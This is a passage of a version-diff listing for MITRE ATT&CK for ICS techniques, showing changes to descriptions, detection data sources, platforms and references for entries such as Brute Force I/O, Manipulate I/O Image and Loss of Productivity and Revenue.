x_mitre_data_sourcesOperational Databases: Process/Event Alarm
x_mitre_platformsDevice Configuration/Parameters

[T0805] Block Serial COM

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 13:04:01.612000+00:00
x_mitre_data_sources[0]Alarm historyNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[1]Data historianNetwork Traffic: Network Connection Creation
x_mitre_data_sources[2]Network protocol analysisApplication Log: Application Log Content
x_mitre_data_sources[3]Packet captureProcess: Process Termination
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesOperational Databases: Process History/Live Data
x_mitre_data_sourcesOperational Databases: Process/Event Alarm
x_mitre_platformsDevice Configuration/Parameters

[T0806] Brute Force I/O

Current version: 0.0


Old Description
New Description
t1Adversaries may brute force I/O addresses on a device and att1Adversaries may repetitively or successively change I/O poin
>tempt to exhaustively perform an action. By enumerating the >t values to perform an action. Brute Force I/O may be achiev
>full range of I/O addresses, an adversary may manipulate a p>ed by changing either a range of I/O point values or a singl
>rocess function without having to target specific I/O interf>e point value repeatedly to manipulate a process function. T
>aces. More than one process function manipulation and enumer>he adversary’s goal and the information they have about the 
>ation pass may occur on the targeted I/O range in a brute fo>target environment will influence which of the options they 
>rce attempt.>choose. In the case of brute forcing a range of point values
 >, the adversary may be able to achieve an impact without tar
 >geting a specific point. In the case where a single point is
 > targeted, the adversary may be able to generate instability
 > on the process function associated with that particular poi
 >nt.  Adversaries may use Brute Force I/O to cause failures w
 >ithin various industrial processes. These failures could be 
 >the result of wear on equipment, or damage to downstream equ
 >ipment.
Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-14 13:04:01.612000+00:00
descriptionAdversaries may brute force I/O addresses on a device and attempt to exhaustively perform an action. By enumerating the full range of I/O addresses, an adversary may manipulate a process function without having to target specific I/O interfaces. More than one process function manipulation and enumeration pass may occur on the targeted I/O range in a brute force attempt.Adversaries may repetitively or successively change I/O point values to perform an action. Brute Force I/O may be achieved by changing either a range of I/O point values or a single point value repeatedly to manipulate a process function. The adversary’s goal and the information they have about the target environment will influence which of the options they choose. In the case of brute forcing a range of point values, the adversary may be able to achieve an impact without targeting a specific point. In the case where a single point is targeted, the adversary may be able to generate instability on the process function associated with that particular point. Adversaries may use Brute Force I/O to cause failures within various industrial processes. These failures could be the result of wear on equipment, or damage to downstream equipment.
x_mitre_data_sources[0]Alarm historyNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Sequential event recorderApplication Log: Application Log Content
x_mitre_data_sources[2]Data historianOperational Databases: Process History/Live Data
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetflow/Enclave netflow
x_mitre_data_sourcesNetwork protocol analysis
x_mitre_data_sourcesPacket capture

[T0858] Change Operating Mode

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-13 11:42:26.506000+00:002021-10-08 13:04:01.612000+00:00
x_mitre_data_sources[0]Alarm historyNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Sequential event recorderApplication Log: Application Log Content
x_mitre_data_sources[2]Network protocol analysisOperational Databases: Device Alarm
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesPacket capture

[T0807] Command-Line Interface

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 13:04:01.612000+00:00
x_mitre_data_sources[0]Process monitoringCommand: Command Execution
x_mitre_data_sources[1]Process command-line parametersProcess: Process Creation
x_mitre_data_sources[2]Network protocol analysisModule: Module Load
x_mitre_data_sources[3]Packet captureProcess: Process Creation
x_mitre_platforms[0]WindowsControl Server
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesScript: Script Execution
x_mitre_platformsData Historian
x_mitre_platformsField Controller/RTU/PLC/IED
x_mitre_platformsHuman-Machine Interface
x_mitre_platformsInput/Output Server

[T0885] Commonly Used Port

Current version: 0.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Network Traffic: Network Traffic Flow']
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 13:04:01.612000+00:00

[T0884] Connection Proxy

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 13:04:01.612000+00:00
x_mitre_data_sources[0]Process use of networkNetwork Traffic: Network Connection Creation
x_mitre_data_sources[1]Process monitoringNetwork Traffic: Network Traffic Content
x_mitre_data_sources[2]Packet captureNetwork Traffic: Network Traffic Flow
x_mitre_platforms[0]WindowsNone
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetflow/Enclave netflow
x_mitre_data_sourcesNetwork protocol analysis

[T0879] Damage to Property

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 13:04:01.612000+00:00
x_mitre_platforms[0]WindowsNone

[T0809] Data Destruction

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 13:04:01.612000+00:00
x_mitre_data_sources[0]File monitoringCommand: Command Execution
x_mitre_data_sources[1]Process command-line parametersFile: File Deletion
x_mitre_data_sources[2]Process monitoringFile: File Modification
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation

[T0811] Data from Information Repositories

Current version: 0.0


Old Description
New Description
t1Adversaries may target and collect data from information rept1Adversaries may target and collect data from information rep
>ositories. This can include sensitive data such as specifica>ositories. This can include sensitive data such as specifica
>tions, schematics, or diagrams of control system layouts, de>tions, schematics, or diagrams of control system layouts, de
>vices, and processes. Examples of information repositories i>vices, and processes. Examples of information repositories i
>nclude reference databases or local machines in the process >nclude reference databases or local machines in the process 
>environment, as well as workstations and databases in the co>environment, as well as workstations and databases in the co
>rporate network that might contain information about the ICS>rporate network that might contain information about the ICS
>. Information collected from these systems may provide the a>. Information collected from these systems may provide the a
>dversary with a better understanding of the operational envi>dversary with a better understanding of the operational envi
>ronment, vendors used, processes, or procedures of the ICS.>ronment, vendors used, processes, or procedures of the ICS. 
 >In a campaign between 2011 and 2013 against ONG organization
 >s, Chinese state-sponsored actors searched document reposito
 >ries for specific information such as, system manuals, remot
 >e terminal unit (RTU) sites, personnel lists, documents that
 > included the string “SCAD*”, user credentials, and remote d
 >ial-up access information.(Citation: CISA Chinese Gas Pipeli
 >ne Intrusion 2011 - 2013 July 2021)
Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-12 16:35:26.506000+00:002021-10-08 15:25:32.143000+00:00
descriptionAdversaries may target and collect data from information repositories. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes. Examples of information repositories include reference databases or local machines in the process environment, as well as workstations and databases in the corporate network that might contain information about the ICS. Information collected from these systems may provide the adversary with a better understanding of the operational environment, vendors used, processes, or procedures of the ICS.Adversaries may target and collect data from information repositories. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes. Examples of information repositories include reference databases or local machines in the process environment, as well as workstations and databases in the corporate network that might contain information about the ICS. Information collected from these systems may provide the adversary with a better understanding of the operational environment, vendors used, processes, or procedures of the ICS. In a campaign between 2011 and 2013 against ONG organizations, Chinese state-sponsored actors searched document repositories for specific information such as, system manuals, remote terminal unit (RTU) sites, personnel lists, documents that included the string “SCAD*”, user credentials, and remote dial-up access information.(Citation: CISA Chinese Gas Pipeline Intrusion 2011 - 2013 July 2021)
x_mitre_data_sources[0]Application logsApplication Log: Application Log Content
x_mitre_data_sources[1]Authentication logsLogon Session: Logon Session Creation
x_mitre_data_sources[2]Data loss preventionFile: File Access
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'CISA Chinese Gas Pipeline Intrusion 2011 - 2013 July 2021', 'description': 'ONG2011 - DHS Advisory - Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA). (2021, July 20). Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013. Retrieved October 8, 2021.', 'url': 'https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf'}
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesThird-party application logs

[T0812] Default Credentials

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]Authentication logsNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Windows event logsLogon Session: Logon Session Creation
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork protocol analysis
x_mitre_data_sourcesPacket capture

[T0814] Denial of Service

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]Alarm historyApplication Log: Application Log Content
x_mitre_data_sources[1]Data historianNetwork Traffic: Network Traffic Content
x_mitre_data_sources[2]Network protocol analysisNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[3]Packet captureOperational Databases: Process History/Live Data
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesSequential event recorder

[T0868] Detect Operating Mode

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-13 11:39:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]Network protocol analysisNetwork Traffic: Network Traffic Content
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesPacket capture

[T0816] Device Restart/Shutdown

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]Sequential event recorderNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Alarm historyApplication Log: Application Log Content
x_mitre_data_sources[2]Network protocol analysisOperational Databases: Device Alarm
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesPacket capture

[T0817] Drive-by Compromise

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]Packet captureApplication Log: Application Log Content
x_mitre_data_sources[1]Network device logsFile: File Creation
x_mitre_data_sources[2]process use of networkNetwork Traffic: Network Traffic Content
x_mitre_data_sources[3]Web proxyProcess: Process Creation
x_mitre_platforms[0]WindowsNone
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesSSl/TLS inspection
x_mitre_data_sourcesNetwork intrusion detection system

[T0871] Execution through API

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]API monitoringModule: Module Load
x_mitre_data_sources[1]Network protocol analysisNetwork Traffic: Network Traffic Content
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesPacket capture

[T0819] Exploit Public-Facing Application

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]Web logsApplication Log: Application Log Content
x_mitre_data_sources[1]Web application firewall logsNetwork Traffic: Network Traffic Content
x_mitre_platforms[0]WindowsHuman-Machine Interface
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesApplication logs
x_mitre_data_sourcesPacket capture

[T0820] Exploitation for Evasion

Current version: 0.0

Details
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sources['Detonation chamber', 'Malware reverse engineering']
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00

[T0890] Exploitation for Privilege Escalation

Current version: 0.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Process: OS API Execution']
values_changed
STIX FieldOld valueNew Value
modified2021-04-13 12:08:26.506000+00:002021-10-08 15:25:32.143000+00:00

[T0866] Exploitation of Remote Services

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-12 19:17:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]Windows error reportingApplication Log: Application Log Content
x_mitre_data_sources[1]Process monitoringNetwork Traffic: Network Traffic Content
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile monitoring

[T0822] External Remote Services

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]Authentication logsApplication Log: Application Log Content
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesLogon Session: Logon Session Metadata
x_mitre_data_sourcesNetwork Traffic: Network Traffic Flow

[T0823] Graphical User Interface

Current version: 0.0


Old Description
New Description
t1Adversaries may attempt to gain access to a machine via a Grt1Adversaries may attempt to gain access to a machine via a Gr
>aphical User Interface (GUI) to enhance execution capabiliti>aphical User Interface (GUI) to enhance execution capabiliti
>es. Access to a GUI allows a user to interact with a compute>es. Access to a GUI allows a user to interact with a compute
>r in a more visual manner than a CLI. A GUI allows users to >r in a more visual manner than a CLI. A GUI allows users to 
>move a cursor and click on interface objects, with a mouse a>move a cursor and click on interface objects, with a mouse a
>nd keyboard as the main input devices, as opposed to just us>nd keyboard as the main input devices, as opposed to just us
>ing the keyboard. If physical access is not an option, then >ing the keyboard. If physical access is not an option, then 
>access might be possible via protocols such as VNC on Linux->access might be possible via protocols such as VNC on Linux-
>based and Unix-based operating systems, and RDP on Windows o>based and Unix-based operating systems, and RDP on Windows o
>perating systems. An adversary can use this access to execut>perating systems. An adversary can use this access to execut
>e programs and applications on the target machine.>e programs and applications on the target machine.  In the O
 >ldsmar water treatment attack, adversaries utilized the oper
 >ator HMI interface through the graphical user interface. Thi
 >s action led to immediate operator detection as they were ab
 >le to see the adversary making changes on their screen. (Cit
 >ation: Oldsmar Water Treatment Attack Feb 2021)
Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-14 15:25:32.143000+00:00
descriptionAdversaries may attempt to gain access to a machine via a Graphical User Interface (GUI) to enhance execution capabilities. Access to a GUI allows a user to interact with a computer in a more visual manner than a CLI. A GUI allows users to move a cursor and click on interface objects, with a mouse and keyboard as the main input devices, as opposed to just using the keyboard. If physical access is not an option, then access might be possible via protocols such as VNC on Linux-based and Unix-based operating systems, and RDP on Windows operating systems. An adversary can use this access to execute programs and applications on the target machine.Adversaries may attempt to gain access to a machine via a Graphical User Interface (GUI) to enhance execution capabilities. Access to a GUI allows a user to interact with a computer in a more visual manner than a CLI. A GUI allows users to move a cursor and click on interface objects, with a mouse and keyboard as the main input devices, as opposed to just using the keyboard. If physical access is not an option, then access might be possible via protocols such as VNC on Linux-based and Unix-based operating systems, and RDP on Windows operating systems. An adversary can use this access to execute programs and applications on the target machine. In the Oldsmar water treatment attack, adversaries utilized the operator HMI interface through the graphical user interface. This action led to immediate operator detection as they were able to see the adversary making changes on their screen. (Citation: Oldsmar Water Treatment Attack Feb 2021)
x_mitre_data_sources[0]File monitoringNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[1]Process monitoringNetwork Traffic: Network Traffic Content
x_mitre_data_sources[2]Process command-line parametersProcess: Process Creation
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Oldsmar Water Treatment Attack Feb 2021', 'description': 'Pinellas County Sheriff’s Office. (2021, February 8). Treatment Plant Intrusion Press Conference. Retrieved October 8, 2021.', 'url': 'https://www.youtube.com/watch?v=MkXDSOgLQ6M'}
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesBinary file metadata

[T0874] Hooking

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]File monitoringFile: File Modification
x_mitre_data_sources[1]Windows registryModule: Module Load
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesAPI monitoring
x_mitre_platformsWindows

[T0877] I/O Image

Current version: 0.0


Old Description
New Description
t1Adversaries may seek to capture process image values relatedt1Adversaries may seek to capture process image values related
> to the inputs and outputs of a PLC. Within a PLC all input > to the inputs and outputs of a PLC. Within a PLC all input 
>and output states are stored into an I/O image. This image i>and output states are stored into an I/O image. This image i
>s used by the user program instead of directly interacting w>s used by the user program instead of directly interacting w
>ith physical I/O. (Citation: PLC-Blaster 2)>ith physical I/O. (Citation: PLC-Blaster 2) Adversaries may 
 >collect the I/O Image state of a PLC by utilizing a device’s
 > Native API to access the memory regions directly. The colle
 >ction of the PLC’s I/O state could be used to replace values
 > or inform future stages of an attack.
Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-14 15:25:32.143000+00:00
descriptionAdversaries may seek to capture process image values related to the inputs and outputs of a PLC. Within a PLC all input and output states are stored into an I/O image. This image is used by the user program instead of directly interacting with physical I/O. (Citation: PLC-Blaster 2)Adversaries may seek to capture process image values related to the inputs and outputs of a PLC. Within a PLC all input and output states are stored into an I/O image. This image is used by the user program instead of directly interacting with physical I/O. (Citation: PLC-Blaster 2) Adversaries may collect the I/O Image state of a PLC by utilizing a device’s Native API to access the memory regions directly. The collection of the PLC’s I/O state could be used to replace values or inform future stages of an attack.
x_mitre_data_sources[0]Controller programAsset: Software/Firmware
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Stuxnet - Symantec - 201102', 'description': 'Nicolas Falliere, Liam O Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier (Version 1.4). Retrieved September 22, 2017.', 'url': 'https://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/w32%20stuxnet%20dossier.pdf'}

[T0872] Indicator Removal on Host

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]File monitoringCommand: Command Execution
x_mitre_data_sources[1]Process monitoringFile: File Deletion
x_mitre_data_sources[2]Process command-line parametersFile: File Metadata
x_mitre_data_sources[3]API monitoringFile: File Modification
x_mitre_data_sources[4]Windows event logsNetwork Traffic: Network Traffic Content
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: OS API Execution
x_mitre_data_sourcesProcess: Process Creation
x_mitre_data_sourcesUser Account: User Account Authentication
x_mitre_data_sourcesWindows Registry: Windows Registry Key Deletion
x_mitre_data_sourcesWindows Registry: Windows Registry Key Modification
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_platformsWindows

[T0883] Internet Accessible Device

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]Authentication logsNetwork Traffic: Network Traffic Flow
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Traffic Content
x_mitre_data_sourcesLogon Session: Logon Session Metadata
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_platformsWindows

[T0867] Lateral Tool Transfer

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-12 16:19:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]File monitoringCommand: Command Execution
x_mitre_data_sources[1]Packet captureFile: File Creation
x_mitre_data_sources[2]Process use of networkFile: File Metadata
x_mitre_data_sources[3]Process monitoringNetwork Traffic: Network Traffic Content
x_mitre_data_sources[4]Netflow/Enclave netflowNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[5]Network protocol analysisProcess: Process Creation

[T0826] Loss of Availability

Current version: 0.0


Old Description
New Description
t1Adversaries may attempt to disrupt essential components or st1Adversaries may attempt to disrupt essential components or s
>ystems to prevent owner and operator from delivering product>ystems to prevent owner and operator from delivering product
>s or services. (Citation: Reference - Corero) (Citation: Ref>s or services. (Citation: Reference - Corero) (Citation: Ref
>erence - SANS - 201510) (Citation: Reference - RIoT)   Adver>erence - SANS - 201510) (Citation: Reference - RIoT)   Adver
>saries may leverage malware to delete or encrypt critical da>saries may leverage malware to delete or encrypt critical da
>ta on HMIs, workstations, or databases.>ta on HMIs, workstations, or databases. In the 2021 Colonial
 > Pipeline ransomware incident, pipeline operations were temp
 >orally halted on May 7th and were not fully restarted until 
 >May 12th.
Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00
descriptionAdversaries may attempt to disrupt essential components or systems to prevent owner and operator from delivering products or services. (Citation: Reference - Corero) (Citation: Reference - SANS - 201510) (Citation: Reference - RIoT) Adversaries may leverage malware to delete or encrypt critical data on HMIs, workstations, or databases.Adversaries may attempt to disrupt essential components or systems to prevent owner and operator from delivering products or services. (Citation: Reference - Corero) (Citation: Reference - SANS - 201510) (Citation: Reference - RIoT) Adversaries may leverage malware to delete or encrypt critical data on HMIs, workstations, or databases. In the 2021 Colonial Pipeline ransomware incident, pipeline operations were temporally halted on May 7th and were not fully restarted until May 12th.

[T0828] Loss of Productivity and Revenue

Current version: 0.0


Old Description
New Description
t1Adversaries may cause loss of productivity and revenue throut1Adversaries may cause loss of productivity and revenue throu
>gh disruption and even damage to the availability and integr>gh disruption and even damage to the availability and integr
>ity of control system operations, devices, and related proce>ity of control system operations, devices, and related proce
>sses. This technique may manifest as a direct effect of an I>sses. This technique may manifest as a direct effect of an I
>CS-targeting attack or tangentially, due to an IT-targeting >CS-targeting attack or tangentially, due to an IT-targeting 
>attack against non-segregated environments. In some cases, t>attack against non-segregated environments.  In cases where 
>his may result from the postponement and disruption of ICS o>these operations or services are brought to a halt, the loss
>perations and production as part of a remediation effort. Op> of productivity may eventually present an impact for the en
>erations may be brought to a halt and effectively stopped in>d-users or consumers of products and services. The disrupted
> an effort to contain and properly remove malware or due to > supply-chain may result in supply shortages and increased p
>the <span class="smw-format list-format "><span class="smw-r>rices, among other consequences.  A ransomware attack on an 
>ow"><span class="smw-field"><span class="smw-value">Loss of >Australian beverage company resulted in the shutdown of some
>Safety</span></span></span></span>.> manufacturing sites, including precautionary halts to prote
 >ct key systems. (Citation: Distrupted Operations at Lion Com
 >pany June 2020) The company announced the potential for temp
 >orary shortages of their products following the attack. (Cit
 >ation: Distrupted Operations at Lion Company June 2020) (Cit
 >ation: Lion Cyber Incident June 2020)  In the 2021 Colonial 
 >Pipeline ransomware incident, the pipeline was unable to tra
 >nsport approximately 2.5 million barrels of fuel per day to 
 >the East Coast. (Citation: Colonial Pipeline System Distrupt
 >ion May 2021)
Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-14 15:25:32.143000+00:00
descriptionAdversaries may cause loss of productivity and revenue through disruption and even damage to the availability and integrity of control system operations, devices, and related processes. This technique may manifest as a direct effect of an ICS-targeting attack or tangentially, due to an IT-targeting attack against non-segregated environments. In some cases, this may result from the postponement and disruption of ICS operations and production as part of a remediation effort. Operations may be brought to a halt and effectively stopped in an effort to contain and properly remove malware or due to the Loss of Safety.Adversaries may cause loss of productivity and revenue through disruption and even damage to the availability and integrity of control system operations, devices, and related processes. This technique may manifest as a direct effect of an ICS-targeting attack or tangentially, due to an IT-targeting attack against non-segregated environments. In cases where these operations or services are brought to a halt, the loss of productivity may eventually present an impact for the end-users or consumers of products and services. The disrupted supply-chain may result in supply shortages and increased prices, among other consequences. A ransomware attack on an Australian beverage company resulted in the shutdown of some manufacturing sites, including precautionary halts to protect key systems. (Citation: Distrupted Operations at Lion Company June 2020) The company announced the potential for temporary shortages of their products following the attack. (Citation: Distrupted Operations at Lion Company June 2020) (Citation: Lion Cyber Incident June 2020) In the 2021 Colonial Pipeline ransomware incident, the pipeline was unable to transport approximately 2.5 million barrels of fuel per day to the East Coast. (Citation: Colonial Pipeline System Distruption May 2021)
x_mitre_platforms[0]WindowsNone
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Distrupted Operations at Lion Company June 2020', 'description': 'Paganini, Pierluigi. (2020, June 14). Ransomware attack disrupts operations at Australian beverage company Lion. Retrieved October 8, 2021.', 'url': 'https://securityaffairs.co/wordpress/104749/cyber-crime/ransomware-attack-hit-lion.html'}
external_references{'source_name': 'Lion Cyber Incident June 2020', 'description': 'Lion Corporation. (2020, June 26). Lion Cyber incident update: 26 June 2020. Retrieved October 8, 2021.', 'url': 'https://lionco.com/2020/06/26/lion-update-re-cyber-issue/'}
external_references{'source_name': 'Colonial Pipeline System Distruption May 2021', 'description': 'Colonial Pipeline Company. (2021, May). Media Statement Update: Colonial Pipeline System Disruption. Retrieved October 8, 2021.', 'url': 'https://www.colpipe.com/news/press-releases/media-statement-colonial-pipeline-system-disruption'}

[T0880] Loss of Safety

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-04-12 07:57:26.506000+00:00
x_mitre_platforms[0]WindowsNone

[T0829] Loss of View

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-04-12 07:57:26.506000+00:00

[T0830] Man in the Middle

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-12 15:35:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]Network device logsNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[1]Netflow/Enclave netflowNetwork Traffic: Network Traffic Content
x_mitre_data_sources[2]Packet captureProcess: OS API Execution
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation
x_mitre_data_sourcesCommand: Command Execution

[T0835] Manipulate I/O Image

Current version: 0.0


Old Description
New Description
t1Adversaries may manipulate the I/O image of PLCs through vart1Adversaries may manipulate the I/O image of PLCs through var
>ious means to prevent them from functioning as expected. Met>ious means to prevent them from functioning as expected. Met
>hods of I/O image manipulation may include overriding the I/>hods of I/O image manipulation may include overriding the I/
>O table via direct memory manipulation or using the override>O table via direct memory manipulation or using the override
> function used for testing PLC programs. (Citation: Guidance> function used for testing PLC programs. (Citation: Guidance
> - ISA PLC)    During the PLC scan cycle, the state of the a> - ISA PLC)    During the scan cycle, a PLC reads the status
>ctual physical inputs is copied to a portion of the PLC memo> of all inputs and stores them in an image table.2 The image
>ry, commonly called the input image table. When the program > table is the PLC’s internal storage location where values o
>is scanned, it examines the input image table to read the st>f inputs/outputs for one scan are stored while it executes t
>ate of a physical input.   When the logic determines the sta>he user program. After the PLC has solved the entire logic p
>te of a physical output, it writes to a portion of the PLC m>rogram, it updates the output image table. The contents of t
>emory commonly called the output image table. The output ima>his output image table are written to the corresponding outp
>ge may also be examined during the program scan. To update t>ut points in I/O Modules.  One of the unique characteristics
>he physical outputs, the output image table contents are cop> of PLCs is their ability to override the status of a physic
>ied to the physical outputs after the program is scanned.  O>al discrete input or to override the logic driving a physica
>ne of the unique characteristics of PLCs is their ability to>l output coil and force the output to a desired status.
> override the status of a physical discrete input or to over 
>ride the logic driving a physical output coil and force the  
>output to a desired status. 
Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-14 15:25:32.143000+00:00
descriptionAdversaries may manipulate the I/O image of PLCs through various means to prevent them from functioning as expected. Methods of I/O image manipulation may include overriding the I/O table via direct memory manipulation or using the override function used for testing PLC programs. (Citation: Guidance - ISA PLC) During the PLC scan cycle, the state of the actual physical inputs is copied to a portion of the PLC memory, commonly called the input image table. When the program is scanned, it examines the input image table to read the state of a physical input. When the logic determines the state of a physical output, it writes to a portion of the PLC memory commonly called the output image table. The output image may also be examined during the program scan. To update the physical outputs, the output image table contents are copied to the physical outputs after the program is scanned. One of the unique characteristics of PLCs is their ability to override the status of a physical discrete input or to override the logic driving a physical output coil and force the output to a desired status.Adversaries may manipulate the I/O image of PLCs through various means to prevent them from functioning as expected. Methods of I/O image manipulation may include overriding the I/O table via direct memory manipulation or using the override function used for testing PLC programs. (Citation: Guidance - ISA PLC) During the scan cycle, a PLC reads the status of all inputs and stores them in an image table.2 The image table is the PLC’s internal storage location where values of inputs/outputs for one scan are stored while it executes the user program. After the PLC has solved the entire logic program, it updates the output image table. The contents of this output image table are written to the corresponding output points in I/O Modules. One of the unique characteristics of PLCs is their ability to override the status of a physical discrete input or to override the logic driving a physical output coil and force the output to a desired status.
x_mitre_data_sources[0]Controller programOperational Databases: Process History/Live Data
x_mitre_data_sources[1]Process monitoringOperational Databases: Device Alarm
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'PLC-Blaster 2', 'description': 'Spenneberg, Ralf. (2016). PLC-Blaster. Retrieved June 6, 2019.', 'url': 'https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC.pdf'}
external_references{'source_name': 'Stuxnet - Symantec - 201102', 'description': 'Nicolas Falliere, Liam O Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier (Version 1.4). Retrieved September 22, 2017.', 'url': 'https://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/w32%20stuxnet%20dossier.pdf'}
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_platformsWindows

[T0831] Manipulation of Control

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-04-12 07:57:26.506000+00:00
x_mitre_platforms[0]WindowsNone

[T0832] Manipulation of View

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-04-12 07:57:26.506000+00:00
